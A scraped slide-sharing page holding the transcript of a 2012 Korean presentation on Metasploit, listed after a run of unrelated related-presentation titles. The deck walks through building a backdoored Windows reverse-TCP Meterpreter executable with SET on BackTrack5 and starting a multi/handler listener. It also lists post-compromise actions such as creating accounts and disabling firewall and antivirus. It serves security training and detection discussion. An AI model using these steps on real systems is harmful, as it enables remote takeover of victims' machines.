Matasploit의 소개와 사용법 2012. 7. 20.

Slides:



Advertisements
Similar presentations
최근 사이버침해 유형 및 대응방안 정보기반과. 목차  1. 최근 사이버테러 동향 최근 정보보호 동향 최근 정보보호 동향 최근 침해사고동향 최근 침해사고동향 최근 사이버테러 공격의 특징 최근 사이버테러 공격의 특징  2. 사이버 테러 공격 단계 및 유형  3. 사이버.
Advertisements

ⓒ 2015 NHN Entertainment Corp. Django 로 만드는 초간단 블로그 시스템운영팀 김영태 개발환경 구축.
서울혁신기획관 익명성과 인간소외 심화, 공동체 해체 … 시민의 행복지수와 삶의 질 하락 … 2 I. 왜 … 마을공동체인가 ! 1.
신입생 Study 커리큘럼 OneScore. Contents 후니의 시스코 네트워킹 (4 주 ) 01/ Network 생활코딩 – 웹 서비스 만들기 (4 주 ) Wowhacker 웹 게임 (4 주 ) 02/ Web 뇌를 자극하는 윈도우 시스템 프로그래밍 (4 주 ) 리버싱.
I. 프로젝트 동기 II. 프로젝트 목표 III. 파일시스템 IV. 암호화 및 복호화 V. 인터페이스 VI. FBR READ/WRITE VII. 프로그램 흐름도 VIII. 미 구현 사항 IX. 프로젝트 기대효과 X. 프로그램 요구사항 및 팀원 역할분담 XI. 시연 XII.
Android 프로그램개발 환경. 학습 목표 ■ 교육 목표  JDK 설치  JDK 환경 설정  Eclipse 설치  Android SDK 설치  ADT Plug-in 설치  Android Virtual Device(AVD) 설치  Android 예제 프로그램.
앱인벤터 기초과정 (1차시) ㈜헬로앱스 강사: 김영준 목원대학교 겸임교수.
목 차 I 방위산업의 정의 II 방위산업의 특성 III 방위산업의 현황.
Windows XP SP2 문제해결 Windows XP SP2를 설치한 회원께서는 Pop-up차단 기능과 ActiveX 설치의 어려움 발생 아래의 예는 안철수 바이러스 설치 시 문제점을 해결 하는 방법의 설명. 1. ActiveX 컨트롤 설치 ① 주소 표시줄 아래의 '이.
컴퓨터 운영체제의 역사 손용범.
목 차 C# 언어 특징 .NET 프레임워크 C# 콘솔 프로그램 C# 윈도우 프로그램 실습 프로그래밍세미나 2.

캡스톤 디자인 졸업논문 중간보고서 순천향대학교 컴퓨터공학과 빛의전사.
DICOM Security 디지털정보융합학과 심영복.
Snort & Snorby.
컴퓨터프로그래밍 1주차실습자료 Visual Studio 2005 사용법 익히기.
Index SendMemo 기능 Q & A 팀 소개 배경 및 목적 구현
1. 신뢰할 수 있는 싸이트 등록 인터넷 익스플로러 실행 후 실행
1. Windows Server 2003의 역사 개인용 Windows의 발전 과정
카스퍼스키 랩 PC 보안 세미나 이성식.
윈도우7 체크 설치 매뉴얼
Hadoop 2.완전 분산 처리.
오 태 호 POSTECH Laboratory for UNIX Security
Social Engineer Toolkit
Mysql Install on Azure
4장. 웹로직 서버상에서의 JDBC와 JTA의 운용
무선인터넷 보안기술 컴퓨터공학부 조한별.
4-1장. MySQL 제13장.
CHAPTER 02 OpenCV 개요 PART 01 영상 처리 개요 및 OpenCV 소개.
정보화 사회와 컴퓨터 보안.
웹 서버 보안관리의 간소화를 위한 WebKnight 원격관리 시스템 구현
지역맞춤형 일자리창출 사업 기관 평가
AutoBase10 설치 / 데모 프로젝트 실행.
D / K / I / T / E / C / H / N / O / L / O / G / Y
WinCE Device Driver 실습 #2
TRUST 이주창 Online C Compier RPG game So hard INDEX.
Malware (Sample) Static/Dynamic Analysis (no reversing)
올바른 이메일 사용법
AVR – ATmega103(ATMEL) Compilers & ISP
1차 프로젝트 발표 GAME ENGINE 게임 공학과 이성진.
Windows에서 Virtual Box를 이용한 Ubuntu 설치
WindowsXP 설치와 동시에 해야 할 일 Windows XP 완벽한 설치
Go Lang 리뷰 이동은.
HTTP 프로토콜의 요청과 응답 동작을 이해한다. 서블릿 및 JSP 를 알아보고 역할을 이해한다.
Wi-Fi 취약점 분석 본 프로젝트는 Wi-Fi 환경에서의 취약점 분석을 위한 프로젝트로 다양한 공격방법을 테스트
지방공무원 임용시험 위탁 및 공동추진 충청북도교육청 (목) 총무과 교육행정 6급 안 병 대
ASP.NET AJAX / AJAX Control Toolkit 응용 2008 컴퓨터공학실험( I )
Windows XP 서비스 팩2를 설치하는 10가지 이유
※ 인터넷 옵션 조치 방법 ※ ★ 신뢰사이트 등록 (1) ★ 우리들을 신뢰해주세요^^* 방법이 복잡해 보일지 모르지만
※ 편리한 사이버 연수원 사용을 위한 인터넷 최적화 안내 ※
네트워크 환경 구축과 이미지 전송 호스트/타겟 통신 직렬 통신을 이용한 이미지 전송 수퍼 데몬 BOOTP 환경 구축
학습목표 처음 만드는 비주얼 베이직 프로그램 프로그램 실행과 실행 파일 생성. 학습목표 처음 만드는 비주얼 베이직 프로그램 프로그램 실행과 실행 파일 생성.
1월 KB손해보험 설계사 시상 I. 설맞이 2017년 Good Start 상품시상 II. A군 FC 주차시상 5만원↑
뇌를 자극하는 Solaris bible.
모의해킹 따라하기 웹 해킹 김 지수
StyleCop 소개 SGS Framework 개발 팀.
원격교육활용론 11. 원격교육 컨텐츠 설계 : 실습 패키지 박소연 (광주대학교).
웹 애플리케이션 보안 Trend 인포섹㈜ 신수정 상무
존 듀이의 경험교육론에 기초한 초등학교 체험활동 특징에 관한 연구
슬라이드 쇼의 설정 슬라이드 쇼의 실행 파일과 폴더의 관리 글꼴을 포함해서 저장 웹 페이지로 게시 압축 파일
제9주 예산 수립과 집행.
중등학생평가연수 (중학교) 일시 : (목) 10:00 장소 : 부산교육연구정보원 ㅣ중등교육과 ㅣ
TERM PROJECT 최종 보고 발표 안내 2010 컴퓨터공학실험(Ⅰ).
Wake On Lan 발표자: 김 홍 기 김홍기 조성오
웹과 모바일 홈페이지의 이해와 제작 웹기획 & 제작
방승욱 여은수 민세훈 해킹.
Windows XP 서비스 팩2를 설치하는 10가지 이유
Platform Builder 사용법.
XSS 취약점을 이용한 웹메일 해킹
실전 프로젝트: 홈페이지 구축 시트콤 프렌즈 팬 사이트 구축하기.
Presentation transcript:

Matasploit의 소개와 사용법 2012. 7. 20

목차 Matasploit 소개 주요기능 주요공격 Demo 토론 및 시사점 별첨. VIRUS Total 탐지여부 확인

I. Metaspoit 이란? History - 2003년 여름 HD Moore 가 코드연구 및 개발등에서 악용될 취약점을 공개할 목적으로 Metasploit 프로젝트를 시작했으며, 현재도 Rapid7에서 최고보안책임자로써 활동하고 있고 그는 2008년 세계 보안분야의 영향력 있는 인물 15인 안에 선정된 바 있음. - Metaspoit은 관련 도구등 을 활용하여 취약점 점검에 편리하도록 익스플로잇을 모아놓은 오픈소스 프레임워크로, 취약점에 대한 깊이 있는 지식이 없어도 간단하고 쉽게 취약점 점검가능 ※ HD Moore 사진 ※ 홈페이지 : http://www.metasploit.com

II. Matasploit 주요 기능 기능 지원OS - 침투테스트 - 웹 캠, 마이크 활용한 도청등의 해킹 - 취약성점검 (Nessus, 오라클, 어도비 플래쉬 및 각종 프로토콜 등 - 백도어 지원OS - Windows, Unix, Linux ※ V4.0.0 기준 explits 등이 작년 8월 1일 업데이트 확인

Demo … III. 타겟시스템 모듈 생성 중략 특징 - 리버싱 shell 코드는 방화벽 우회 가능 - metasploit 을 통하여 간단히 생성 가능 사용법 모듈 로드 - 공격에 필요한 모듈 로드 PAYLOAD - 공격 후 취할 행동 결정 위 PAYLOAD 상세 타입 결정 모듈 생성 완료 상세 안내 Backtrack5를 Vmware상에서 실행 /pentest/exploits/SET/set 프로그램 실행 - 메뉴 중 4번 Create a 4Payload and Listener 선택 - 메뉴 2번 Windows Reverse TCP Meterpreter 선택 - 메뉴 16번 Backdoored Executable (BEST) 선택 - listener port = Random(enter for default) 적용 - start the listener now? Yes or no “NO” 선택  msf.exe 파일 생성 리스너 (console)실행 use exploit/multi/handler – 공격할 exploit 설정 set PAYLOAD windwos/meterpreter/reverse_tcp – 어떤 코드 실행할지 설정 set lhost , set lport 후 exploit … 중략 Demo

Demo VI. 주요 공격 및 시사점 주요공격 시사점 - 해당 공격에 대한 모니터링이 가능한가? - 원격에서 타겟시스템의 계정생성 - 원도우 보안설정(방화벽, 백신) 기능 해제 - 타겟 시스템의 프로그램 임의 실행 Demo 시사점 - 해당 공격에 대한 모니터링이 가능한가? - 초기 타겟 시스템에 쉘 코드는 어떠한 방법들로 실행 시킬수 있는가?

별첨. 바이러스 토탈 (www.virustotal.com) 정보 1. 파일정보 2. MD5 정보

별첨. Doolgi (http://112.169.19.236/) 정보 1. 파일정보

감사합니다.